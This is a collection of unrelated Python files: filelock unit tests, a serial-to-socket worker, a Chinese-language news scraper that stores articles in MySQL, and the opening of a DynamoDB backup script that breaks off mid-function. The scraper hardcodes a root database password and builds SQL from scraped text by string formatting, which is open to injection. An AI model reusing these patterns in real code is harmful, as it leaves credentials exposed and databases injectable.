with lock.acquire() as l3:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l3)
self.assertTrue(lock.is_locked)
self.assertTrue(lock.is_locked)
self.assertFalse(lock.is_locked)
return None
def test_nested_forced_release(self):
"""
Acquires the lock using a with-statement and releases the lock
before leaving the with-statement.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock:
self.assertTrue(lock.is_locked)
lock.acquire()
self.assertTrue(lock.is_locked)
lock.release(force = True)
self.assertFalse(lock.is_locked)
self.assertFalse(lock.is_locked)
return None
def test_threaded(self):
"""
Runs 250 threads, which need the filelock. The lock must be acquired
if at least one thread required it and released, as soon as all threads
stopped.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
def my_thread():
for i in range(100):
with lock:
self.assertTrue(lock.is_locked)
return None
NUM_THREADS = 250
threads = [ExThread(target = my_thread) for i in range(NUM_THREADS)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertFalse(lock.is_locked)
return None
def test_threaded1(self):
"""
Runs multiple threads, which acquire the same lock file with a different
FileLock object. When thread group 1 acquired the lock, thread group 2
must not hold their lock.
"""
def thread1():
"""
Requires lock1.
"""
for i in range(1000):
with lock1:
self.assertTrue(lock1.is_locked)
self.assertFalse(lock2.is_locked) # FIXME (Filelock)
return None
def thread2():
"""
Requires lock2.
"""
for i in range(1000):
with lock2:
self.assertFalse(lock1.is_locked) # FIXME (FileLock)
self.assertTrue(lock2.is_locked)
return None
NUM_THREADS = 10
lock1 = self.LOCK_TYPE(self.LOCK_PATH)
lock2 = self.LOCK_TYPE(self.LOCK_PATH)
threads1 = [ExThread(target = thread1) for i in range(NUM_THREADS)]
threads2 = [ExThread(target = thread2) for i in range(NUM_THREADS)]
for i in range(NUM_THREADS):
threads1[i].start()
threads2[i].start()
for i in range(NUM_THREADS):
threads1[i].join()
threads2[i].join()
self.assertFalse(lock1.is_locked)
self.assertFalse(lock2.is_locked)
return None
def test_timeout(self):
"""
Tests if the lock raises a TimeOut error, when it can not be acquired.
"""
lock1 = self.LOCK_TYPE(self.LOCK_PATH)
lock2 = self.LOCK_TYPE(self.LOCK_PATH)
# Acquire lock 1.
lock1.acquire()
self.assertTrue(lock1.is_locked)
self.assertFalse(lock2.is_locked)
# Try to acquire lock 2.
self.assertRaises(filelock.Timeout, lock2.acquire, timeout=1) # FIXME (Filelock)
self.assertFalse(lock2.is_locked)
self.assertTrue(lock1.is_locked)
# Release lock 1.
lock1.release()
self.assertFalse(lock1.is_locked)
self.assertFalse(lock2.is_locked)
return None
def test_default_timeout(self):
"""
Test if the default timeout parameter works.
"""
lock1 = self.LOCK_TYPE(self.LOCK_PATH)
lock2 = self.LOCK_TYPE(self.LOCK_PATH, timeout = 1)
self.assertEqual(lock2.timeout, 1)
# Acquire lock 1.
lock1.acquire()
self.assertTrue(lock1.is_locked)
self.assertFalse(lock2.is_locked)
# Try to acquire lock 2.
self.assertRaises(filelock.Timeout, lock2.acquire) # FIXME (SoftFileLock)
self.assertFalse(lock2.is_locked)
self.assertTrue(lock1.is_locked)
lock2.timeout = 0
self.assertEqual(lock2.timeout, 0)
self.assertRaises(filelock.Timeout, lock2.acquire)
self.assertFalse(lock2.is_locked)
self.assertTrue(lock1.is_locked)
# Release lock 1.
lock1.release()
self.assertFalse(lock1.is_locked)
self.assertFalse(lock2.is_locked)
return None
def test_context(self):
"""
Tests, if the filelock is released, when an exception is thrown in
a with-statement.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
try:
with lock as lock1:
self.assertIs(lock, lock1)
self.assertTrue(lock.is_locked)
raise Exception()
except:
self.assertFalse(lock.is_locked)
return None
def test_context1(self):
"""
The same as *test_context1()*, but uses the *acquire()* method.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
try:
with lock.acquire() as lock1:
self.assertIs(lock, lock1)
self.assertTrue(lock.is_locked)
raise Exception()
except:
self.assertFalse(lock.is_locked)
return None
def test_del(self):
"""
Tests, if the lock is released, when the object is deleted.
"""
lock1 = self.LOCK_TYPE(self.LOCK_PATH)
lock2 = self.LOCK_TYPE(self.LOCK_PATH)
# Acquire lock 1.
lock1.acquire()
self.assertTrue(lock1.is_locked)
self.assertFalse(lock2.is_locked)
# Try to acquire lock 2.
self.assertRaises(filelock.Timeout, lock2.acquire, timeout = 1) # FIXME (SoftFileLock)
# Delete lock 1 and try to acquire lock 2 again.
del lock1
lock2.acquire()
self.assertTrue(lock2.is_locked)
lock2.release()
return None
class FileLockTest(BaseTest, unittest.TestCase):
"""
Tests the hard file lock, which is available on the current platform.
"""
LOCK_TYPE = filelock.FileLock
LOCK_PATH = "test.lock"
class SoftFileLockTest(BaseTest, unittest.TestCase):
"""
Tests the soft file lock, which is always available.
"""
LOCK_TYPE = filelock.SoftFileLock
LOCK_PATH = "test.softlock"
def test_cleanup(self):
"""
Tests if the lock file is removed after use.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock:
self.assertTrue(os.path.exists(self.LOCK_PATH))
self.assertFalse(os.path.exists(self.LOCK_PATH))
return None
if __name__ == "__main__":
unittest.main()
|
process_worker.py
|
# coding=utf-8
import multiprocessing
import serial
import socket
import os
import fuckargs
# 感应到了就输出1
# 没感应到就输出0
# 串口通讯
# 频率的决定者以硬件的串口通讯频率决定
def get_serial_info( whether ):
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
while True:
whether.value = ser.readline()[0]
# socket server
def socket_server( whether ):
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
host = fuckargs.get( "host" ) # Symbolic name meaning all available interfaces
port = int( fuckargs.get("port") ) # Arbitrary non-privileged port
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) #定义socket类型,网络通信,TCP
s.bind( (host, port) ) #套接字绑定的IP与端口
s.listen( 5 ) #开始TCP监听
while True:
conn, addr = s.accept() #接受TCP连接,并返回新的套接字与IP地址
# print 'Connected by', addr #输出客户端的IP地址
try:
while True:
data=conn.recv(1024) #把接收的数据实例化
res = whether.value
conn.sendall( res )
except:
conn.close() #关闭连接
# Main process
ser = serial.Serial( fuckargs.get("usb"), int( fuckargs.get("bits") ) )
chr = multiprocessing.Value('c', '0')
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
p_serial = multiprocessing.Process( target=get_serial_info, args=(chr,) )
p_socket = multiprocessing.Process( target=socket_server, args=(chr,) )
p_serial.start()
p_socket.start()
|
spider_handlers.py
|
"""爬虫模型库"""
import re, time, logging, uuid, pymysql
from sqlalchemy import text
from app.models.base import Base2
import threading
import urllib.request
from bs4 import BeautifulSoup
logging.basicConfig(level=logging.DEBUG)
__author__ = "带土"
class Spider(Base2):
def __init__(self):
self.count = 0
super().__init__()
def spiderMain(self):
'''主函数'''
# 创建列表爬虫线程 listSpiderThread
listSpiderThread = threading.Thread(target=self.listSpiderThreadBody, name="ListSpiderThread")
# 启动线程 listSpiderThread
listSpiderThread.start()
listSpiderThread.join()
# 创建列表爬虫线程 contentSpiderThread
contentSpiderThread = threading.Thread(target=self.contentSpiderThreadBody, name="ContentSpiderThread")
# 启动线程 contentSpiderThread
contentSpiderThread.start()
contentSpiderThread.join()
return self.count
def listSpiderThreadBody(self):
''' 列表爬虫线程体函数 '''
t = threading.current_thread()
print("列表爬虫线程开始", t.name)
postArr = self.get_ire_posts()
blogPostArr = self.get_single_list()
pastsNameArr = []
for item in blogPostArr:
pastsNameArr.append(item["name"])
self.count = self.insert_single_list(postArr, pastsNameArr)
print("列表爬虫线程结束", t.name, self.count)
def contentSpiderThreadBody(self):
''' 文章爬虫线程体函数 '''
t = threading.current_thread()
print("文章爬虫线程开始", t.name)
spiderContentList = self.get_spider_content_list()
self.count = 0
for n in range(len(spiderContentList)):
url = spiderContentList[n]["url"]
content = self.get_ire_content(url)
obj = {
"content": content,
"url": url,
}
print(obj["url"], obj["content"])
self.count += self.update_single_data(obj)
print("第{0}次执行线程{1},更新数据{2}条".format(n, t.name, self.count))
time.sleep(0.4)
print("文章爬虫线程结束", t.name)
# 爬取文章内容
def get_ire_content(self, url):
req = urllib.request.Request(url)
article = ""
arr = []
with urllib.request.urlopen(req) as res:
data = res.read()
htmlStr = data.decode("gbk")
soup = BeautifulSoup(htmlStr, 'html.parser')
arr = soup.select('.m-article p')
for item in arr:
article += str(item)
return re.sub(r'"', '\'', article)
# 爬取列表
def get_ire_posts(self):
url = "http://column.iresearch.cn/"
req = urllib.request.Request(url)
with urllib.request.urlopen(req) as res:
data = res.read()
htmlStr = data.decode("gbk")
soup = BeautifulSoup(htmlStr, 'html.parser')
liArr = soup.select('div[data="rootId=2&classId=101"] li')
postArr = []
for item in liArr:
obj = {}
obj["name"] = str.strip(item.find("h3").find("a").get_text())
summary = str.strip(item.find("p").get_text())
obj["summary"] = summary.strip('\n\r ')
dt = str.strip(item.find("span").get_text())
timeArray = time.strptime(dt, "%Y/%m/%d %H:%M:%S")
obj["created_at"] = '%f' % time.mktime(timeArray)
obj["content"] = str.strip(item.find("h3").find("a").get("href"))
obj["url"] = str.strip(item.find("h3").find("a").get("href"))
obj["id"] = str('%015d%s000' % (int(time.time() * 1000), uuid.uuid4().hex))
obj["user_id"] = "00158855657446102ff7cb03a1e4bb08db58fa8acaf7440000"
obj["user_name"] = "spider"
obj["user_image"] = "about:blank"
postArr.append(obj)
return postArr
def get_single_list(self):
""" 获取列表数据 """
# 1 建立数据库连接
connection = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='mapei123',
db='awesome',
charset='utf8')
# 要返回的数据
data = []
try:
# 创建游标对象
with connection.cursor() as cursor:
# 3 执行sql操作
sql = 'select id,name,summary,content,created_at,user_name from blogs order by created_at desc'
cursor.execute(sql)
# 4. 提取结果集
result_set = cursor.fetchall()
for row in result_set:
fields = {}
fields['id'] = row[0]
fields['name'] = row[1]
fields['summary'] = row[2]
fields['content'] = row[3]
fields['created_at'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(row[4]))
fields['user_name'] = row[5]
data.append(fields)
except pymysql.DatabaseError as error:
print('数据查询失败' + error)
finally:
# 6 关闭数据库连接
connection.close()
return data
def update_single_data(self, obj):
""" 更新文章数据 """
# 1 建立数据库连接
connection = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='mapei123',
db='awesome',
charset='utf8')
affectedCount = 0
try:
# 创建游标对象
with connection.cursor() as cursor:
# 3 执行sql操作
sql = 'update blogs set content = "{0}" WHERE content = "{1}"'.format(obj["content"], obj["url"])
affectedCount = cursor.execute(sql)
logging.info(f"影响的数据行数{affectedCount}")
# 4 提交数据库事务
connection.commit()
except pymysql.DatabaseError as error:
# 5 回滚数据库事务
connection.rollback()
logging.debug('插入数据失败' + error)
finally:
# 6 关闭数据库连接
connection.close()
return affectedCount
def get_spider_content_list(self):
""" 查找爬虫文章列表数据 """
# 1 建立数据库连接
connection = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='mapei123',
db='awesome',
charset='utf8')
# 要返回的数据
data = []
try:
# 创建游标对象
with connection.cursor() as cursor:
# 3 执行sql操作
sql = 'SELECT id,content FROM blogs WHERE content LIKE "http://%"'
cursor.execute(sql)
# 4. 提取结果集
result_set = cursor.fetchall()
for row in result_set:
fields = {}
fields['id'] = row[0]
fields['url'] = row[1]
data.append(fields)
except pymysql.DatabaseError as error:
print('数据查询失败' + error)
finally:
# 6 关闭数据库连接
connection.close()
return data
def insert_single_list(self, list, pastsIdArr):
""" 插入文章数据 """
# 1 建立数据库连接
connection = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='mapei123',
db='awesome',
charset='utf8')
affectedCount = 0
valStr = ""
for item in list:
if item["name"] not in pastsIdArr:
valStr += f',(\'{item["id"]}\',\'{item["user_id"]}\',\'{item["user_name"]}\',\'{item["user_image"]}\',\'{item["name"]}\',\'{item["summary"]}\',\'{item["content"]}\',\'{item["created_at"]}\')'
try:
# 创建游标对象
with connection.cursor() as cursor:
# 3 执行sql操作
sql = 'insert into blogs ' \
'(id,user_id,user_name,user_image,name,summary,content,created_at)' \
' VALUES ' + valStr[1:]
print("sql", sql)
affectedCount = cursor.execute(sql)
logging.info(f"影响的数据行数{affectedCount}")
# 4 提交数据库事务
connection.commit()
except pymysql.DatabaseError as error:
# 5 回滚数据库事务
connection.rollback()
logging.debug('插入数据失败' + error)
finally:
# 6 关闭数据库连接
connection.close()
return affectedCount
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with dynalite).
"""
import argparse
import fnmatch
import json
import logging
import os
import shutil
import threading
import datetime
import errno
import sys
import time
import re
import zipfile
import tarfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
except ImportError:
from urllib2 import urlopen, URLError, HTTPError
import boto3
from boto3_type_annotations.dynamodb import Client as DynamodbClient
from boto3_type_annotations.sts import Client as StsClient
from boto3_type_annotations.s3 import Client as S3Client
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
MAX_NUMBER_BACKUP_WORKERS = 25
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
json.JSONEncoder.default = lambda self,obj: (obj.isoformat() if isinstance(obj, datetime.datetime) else None)
def _get_aws_client(
service: str,
profile: str = None,
region: str = None,
secret_key: str = None,
access_key: str = None,
):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = urlopen(
METADATA_URL + "placement/availability-zone",
data=None,
timeout=5
).read().decode()
aws_region = azone[:-1]
except HTTPError as e:
logging.exception("Error determining region used for AWS client. Typo in code?\n\n" +
str(e))
sys.exit(1)
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
if profile:
session = boto3.Session(
profile_name=profile,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(service,
region_name=aws_region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts: StsClient = _get_aws_client(profile=profile, region=region, service="sts")
dynamo: DynamodbClient = _get_aws_client(profile=profile, region=region, service="dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator(operation_name="list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(region, account_number, table)
table_tags = dynamo.list_tags_of_resource(
ResourceArn=table_arn
)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3: S3Client = _get_aws_client(profile=profile, region=region, service="s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(bucket_object, bucket, bucket_object,
ExtraArgs={
"ServerSideEncryption": "AES256"
})
except s3.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3: S3Client = _get_aws_client(profile=profile, region=region, service="s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(
Bucket=bucket
)
except s3.exceptions.ClientError as e:
logging.exception("S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e))
sys.exit(1)
try:
contents = s3.list_objects_v2(
Bucket=bucket,
Prefix=args.dumpPath
)
except s3.exceptions.ClientError as e:
logging.exception("Issue listing contents of bucket " + bucket + "\n\n" + str(e))
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception("Unable to find file to restore from. "
"Confirm the name of the table you're restoring.")
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception("compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e))
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception("Zip file would be too large. Update code to use Zip64 to continue.")
sys.exit(1)
else:
logging.error("Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file")
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
optional_args = {}
if last_evaluated_table_name is not None:
optional_args['ExclusiveStartTableName'] = last_evaluated_table_name
table_list = conn.list_tables(**optional_args)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.."
% args.dumpPath)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!"
% dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0])
.split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name)\
.split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn: DynamodbClient, sleep_interval: int, table_name: str):
"""
Delete table table_name
"""
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(TableName=table_name)
except conn.exceptions.ResourceNotFoundException:
table_exist = False
logging.info(table_name + " table deleted!")
break
except conn.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info("Control plane limit exceeded, retrying deletion of " +
table_name + "..")
time.sleep(sleep_interval)
except conn.exceptions.ResourceInUseException:
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except conn.exceptions.ResourceNotFoundException:
logging.info(table_name + " table deleted.")
pass
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(RequestItems=request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) +
" unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " +
json.dumps(unprocessed_items, indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be indesired state
"""
while True:
if conn.describe_table(TableName=table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(TableName=table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(conn, table_name, read_capacity, write_capacity, wait=True):
"""
Update provisioned throughput on the table to provided values
"""
logging.info("Updating " + table_name + " table read capacity to: " +
str(read_capacity) + ", write capacity to: " + str(write_capacity))
while True:
try:
conn.update_table(TableName=table_name,ProvisionedThroughput=
{"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity)})
break
except conn.exceptions.ResourceNotFoundException:
logging.info("Limit exceeded, retrying updating throughput of " + table_name + "..")
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info("Control plane limit exceeded, retrying updating throughput"
"of " + table_name + "..")
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo: DynamodbClient, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(TableName=table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
optional_args = {}
if table_local_secondary_indexes is not None:
optional_args['LocalSecondaryIndexes'] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args['GlobalSecondaryIndexes'] = table_global_secondary_indexes
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_name,
KeySchema=table_key_schema,
ProvisionedThroughput=table_provisioned_throughput,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info("Control plane limit exceeded, retrying creation of " +
table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(TableName=table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# override table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo, table_name,
read_capacity, original_write_capacity)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
optional_args = {}
if last_evaluated_key is not None:
optional_args['ExclusiveStartKey'] = last_evaluated_key
scanned_table = dynamo.scan(
TableName=table_name,
**optional_args
)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.error("EXCEEDED THROUGHPUT ON TABLE " +
table_name + ". BACKUP FOR IT IS USELESS.")
tableQueue.task_done()
f = open(
args.dumpPath + os.sep + table_name + os.sep + DATA_DIR + os.sep +
str(i).zfill(4) + ".json", "w+"
)
del scanned_table['ResponseMetadata']
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False)
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
tableQueue.task_done()
def do_restore(dynamo: DynamodbClient, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.."
% (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!"
% (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
